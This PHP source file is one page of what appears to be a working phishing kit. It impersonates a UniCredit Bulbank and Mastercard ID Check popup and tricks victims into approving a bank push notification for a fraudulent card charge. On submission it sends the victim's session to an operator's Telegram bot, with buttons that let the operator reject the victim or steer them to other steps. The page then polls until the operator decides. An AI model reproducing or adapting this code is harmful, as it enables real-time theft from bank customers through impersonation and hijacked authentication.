<?php
// step4.php (With UniCredit design for Push Notification)
session_start();

// // --- SECURITY BLOCK ---
// if (!isset($_SESSION['current_step']) || $_SESSION['current_step'] < 3) {
//     header("HTTP/1.1 403 Forbidden");
//     die("Security violation: Invalid step sequence.");
// }
// // --- END SECURITY BLOCK ---

ini_set('display_errors', 1); error_reporting(E_ALL);
require_once 'config.php';

// --- REFRESH-WHILE-WAITING FIX ---
$initial_state = (isset($_SESSION['status']) && $_SESSION['status'] === 'pending') ? 'waiting' : 'form';

// --- 1. ADMIN ACTION: SET NEXT STEP ---
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'set_next_step') {
    $session_id_to_update = $_GET['user'] ?? ''; $next_step = $_GET['next_step'] ?? '';
    if (!empty($session_id_to_update) && !empty($next_step)) {
        session_write_close(); session_id($session_id_to_update); session_start();
        if ($next_step === 'rejected') { $_SESSION['status'] = 'rejected'; } else { $_SESSION['status'] = 'redirect'; $_SESSION['next_step'] = $next_step; }
        session_write_close(); echo "Action Recorded."; exit();
    }
}

// --- 2. USER ACTION: PROCESS FORM SUBMISSION ---
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    header('Content-Type: application/json');
    // Since there's no input, this will correctly default to 'N/A'
    $_SESSION['user_data']['step4_input'] = $_POST['input_for_step4'] ?? 'N/A';
    $_SESSION['status'] = 'pending'; $_SESSION['current_step'] = 4;
    $session_id = session_id(); $script_url = (isset($_SERVER['HTTPS'])?"https":"http")."://{$_SERVER['HTTP_HOST']}{$_SERVER['SCRIPT_NAME']}";
    $reject_url = $script_url."?action=set_next_step&next_step=rejected&user=".$session_id; $goto1_url = $script_url."?action=set_next_step&next_step=1&user=".$session_id; $goto2_url = $script_url."?action=set_next_step&next_step=2&user=".$session_id; $goto3_url = $script_url."?action=set_next_step&next_step=3&user=".$session_id; $goto5_url = $script_url."?action=set_next_step&next_step=5&user=".$session_id;
    // The message is updated to reflect a simple confirmation
    $message = "👤 STEP 4 PUSH CONFIRMATION\n  - User has confirmed they accepted the push notification.\n\nChoose next step:";
    $keyboard = ['inline_keyboard' => [ [['text' => '❌ Reject', 'url' => $reject_url]], [['text' => '⬅️ Go to 1', 'url' => $goto1_url], ['text' => '⬅️ Go to 2', 'url' => $goto2_url]], [['text' => '⬅️ Go to 3', 'url' => $goto3_url], ['text' => 'Go to 5 ➡️', 'url' => $goto5_url]] ]];
    $url = "https://api.telegram.org/bot{$TELEGRAM_TOKEN}/sendMessage";
    $post_fields = ['chat_id' => $TELEGRAM_CHAT_ID, 'text' => $message, 'parse_mode' => 'Markdown', 'reply_markup' => json_encode($keyboard)];
    $ch = curl_init(); curl_setopt_array($ch, [CURLOPT_URL => $url, CURLOPT_POST => 1, CURLOPT_POSTFIELDS => http_build_query($post_fields), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10]); curl_exec($ch); curl_close($ch);
    echo json_encode(['status' => 'pending']); exit();
}

// --- 3. BROWSER ACTION: CHECK FOR STATUS UPDATES ---
if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['action']) && $_GET['action'] === 'check_status') {
    header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header('Content-Type: application/json');
    $response = ['status' => $_SESSION['status'] ?? 'form', 'next_step' => $_SESSION['next_step'] ?? null];
    echo json_encode($response);
    if (isset($_SESSION['status']) && $_SESSION['status'] !== 'pending') { unset($_SESSION['status']); } if (isset($_SESSION['next_step'])) { unset($_SESSION['next_step']); }
    session_write_close(); exit();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Step 4 - Confirmation</title>
<style>
    /* --- CSS IS IDENTICAL TO STEP 3 --- */
    body, html { margin: 0; padding: 0; height: 100%; overflow: hidden; }
    #background-iframe { position: fixed; top: 0; left: 0; width: 100%; height: 100%; border: none; transition: filter 0.3s ease; }
    #background-iframe.blurred { filter: blur(5px); pointer-events: none; }
    .popup-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(255, 255, 255, 0.8); display: flex; justify-content: center; align-items: center; z-index: 1000; }
    .popup-container { font-family: Arial, Helvetica, sans-serif; background-color: #fff; border: 1px solid #ddd; box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15); width: 100%; max-width: 500px; text-align: left; padding: 20px 30px 30px 30px; }
    .popup-header { display: flex; justify-content: space-between; align-items: flex-start; margin-bottom: 25px; }
    .popup-header .bank-logo { width: 140px; }
    .popup-header .id-check-logo { text-align: right; }
    .popup-header .id-check-logo img { height: 28px; }
    .popup-header .id-check-logo .flags { margin-bottom: 5px; }
    .popup-header .id-check-logo .flags img { height: 14px; margin-left: 4px; }
    .popup-header .id-check-logo span { font-weight: bold; color: #555; font-size: 18px; }
    .popup-container h2 { font-size: 24px; color: #c00; font-weight: normal; margin-top: 0; margin-bottom: 25px; border-bottom: 1px solid #eee; padding-bottom: 15px; }
    .transaction-details { font-size: 16px; color: #666; border-bottom: 1px solid #eee; padding-bottom: 15px; margin-bottom: 15px; }
    .transaction-details .detail-row { display: flex; margin-bottom: 8px; }
    .transaction-details .detail-label { width: 140px; }
    .transaction-details .detail-value { font-weight: bold; color: #000; }
    .instructions { font-size: 13px; color: #888; margin-bottom: 15px; }
    .instructions .highlight { color: #000; font-size: 16px; margin-top: 15px; }
    #page-form { text-align: center; }
    /* The input style is no longer needed but kept for consistency if you add one later */
    #page-form input { width: 100%; padding: 12px; border: 1px solid #89c3eb; border-radius: 4px; box-sizing: border-box; margin-bottom: 25px; font-size: 16px; text-align: center; }
    #page-form button { margin-top: 25px; width: 100%; max-width: 280px; padding: 12px; background-color: #3c4b58; color: #fff; border: none; border-radius: 4px; font-size: 14px; font-weight: bold; cursor: pointer; }
    .popup-footer { display: flex; justify-content: space-between; align-items: center; margin-top: 30px; padding-top: 15px; border-top: 1px solid #eee; }
    .popup-footer a { color: #007bff; text-decoration: none; font-size: 14px; }
    .loader { display: none; border: 4px solid #f3f3f3; border-radius: 50%; border-top: 4px solid #007bff; width: 32px; height: 32px; animation: spin 1s linear infinite; margin: 20px auto 0; }
    @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
    .popup-container.is-waiting .loader { display: block; }
    .popup-container.is-waiting .popup-content { display: none; }
    .status-message { padding: 16px; margin-top: 20px; border-radius: 4px; display: none; color: #fff; text-align: center; }
    .status-message.pending { background-color: #ffc107; color: #333; }
    .status-message.rejected { background-color: #dc3545; }
</style>
</head>
<body>

    <iframe id="background-iframe" src="step2.php?view=background" class="blurred"></iframe>

    <div class="popup-overlay">
        <div id="popup-component" class="popup-container <?php if ($initial_state === 'waiting') echo 'is-waiting'; ?>">
            <div class="popup-content">
                <div class="popup-header">
                    <img src="https://i.imgur.com/rG2P1fJ.png" alt="UniCredit Bulbank Logo" class="bank-logo">
                    <div class="id-check-logo">
                        <div class="flags"><img src="https://i.imgur.com/p3n7y87.png" alt="Bulgarian Flag"><img src="https://i.imgur.com/vA1T6s6.png" alt="UK Flag"></div>
                        <img src="https://i.imgur.com/2A5w6eJ.png" alt="Mastercard Logo"><span>ID Check</span>
                    </div>
                </div>

                <h2>Confirm Your Identity</h2>
                <div class="transaction-details">
                    <div class="detail-row"><div class="detail-label">Merchant:</div><div class="detail-value">Grab*</div></div>
                    <div class="detail-row"><div class="detail-label">Amount:</div><div class="detail-value">5.00 THB</div></div>
                    <div class="detail-row"><div class="detail-label">Card number:</div><div class="detail-value">**** **** **** 4110</div></div>
                </div>
                <div class="instructions">
                    <p>A push notification has been sent to your registered device. Please approve the request to continue.</p>
                    <p class="highlight">After accepting on your mobile device, press the button below.</p>
                </div>

                <!-- THE CHANGE IS HERE: No input, just the button -->
                <form id="page-form">
                    <button type="submit">I HAVE ALREADY ACCEPTED</button>
                </form>

                <div class="popup-footer">
                    <a href="#">Exit</a>
                    <a href="#">? Additional Information</a>
                </div>
            </div>

            <div class="loader"></div>
            <div id="status-message" class="status-message"></div>
        </div>
    </div>

<script>
// --- JAVASCRIPT IS UNCHANGED AND CORRECT FOR STEP 4 ---
document.addEventListener('DOMContentLoaded', function() {
    const popupComponent = document.getElementById('popup-component');
    const form = document.getElementById('page-form');
    const statusMessage = document.getElementById('status-message');
    const initialState = '<?php echo $initial_state; ?>';
    let statusInterval;

    function enterWaitingState() {
        popupComponent.classList.add('is-waiting');
        statusMessage.className = 'status-message pending';
        statusMessage.textContent = 'Waiting for confirmation...';
        statusMessage.style.display = 'block';
    }

    function checkStatus() {
        fetch('step4.php?action=check_status', { cache: 'no-store' })
            .then(response => response.json())
            .then(data => {
                if (data.status === 'redirect' && data.next_step) {
                    clearInterval(statusInterval);
                    statusMessage.textContent = `Redirecting...`;
                    window.location.href = `step${data.next_step}.php`;
                } else if (data.status === 'rejected') {
                    clearInterval(statusInterval);
                    popupComponent.classList.remove('is-waiting');
                    statusMessage.className = 'status-message rejected';
                    statusMessage.textContent = 'Confirmation failed. Please try again.';
                    statusMessage.style.display = 'block';
                    statusInterval = setInterval(checkStatus, 2000);
                }
            }).catch(console.error);
    }

    form.addEventListener('submit', function(event) {
        event.preventDefault();
        statusMessage.style.display = 'none';
        enterWaitingState();
        fetch(window.location.pathname, {
            method: 'POST',
            body: new FormData(form)
        }).catch(console.error);
    });

    if (initialState === 'waiting') {
        enterWaitingState();
    }

    statusInterval = setInterval(checkStatus, 2000);
});
</script>

</body>
</html>